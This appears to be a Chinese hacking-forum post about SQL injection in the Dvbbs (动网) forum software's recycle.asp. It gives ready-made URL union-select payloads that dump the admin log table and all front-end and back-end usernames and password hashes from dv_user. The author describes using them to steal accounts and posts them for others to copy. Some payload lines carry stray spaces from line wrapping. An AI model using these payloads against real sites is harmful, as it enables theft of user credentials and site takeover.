|
前阵看到llikz的一个大作,获得动网前台管理员后暴log日志的方法。文章题目是《夏日动网“洞”不断》,呵呵,大家网络自行搜索。
recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_conte nt,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%2 01,1,1,1,1,1%20from%20dv_bbs1
然后网络上出现了暴出全部日志的语句,真的棒极了。
recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_conte nt,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20 select%201,1,1,1,1,1%20from%20dv_bbs1
关于使用方法不多啰唆咯,网络上实在太多。
然后在我一次拿帐号的过程中发现有个站的日志全被清空了,比较郁闷,于是修改了一下暴字段内容的语句,帖出来方便下不熟悉的朋友
暴前台所有用户:
recycle.asp?tablename=dv_bbs1%20union%20select%201,2,usernam e,userpassword,5,6%20from% 20dv_user%20where%20userid>0%20union%20select%201,1,1,1,1 ,1%20from%20dv_bbs1
暴后台所有用户:
recycle.asp?tablename=dv_bbs1%20union%20select%201,2,usernam e,password,5,6%20from%20dv_user%20where%20l_id>0%20union% 20select%201,1,1,1,1,1%20from%20dv_bbs1文字 [s:49] |
|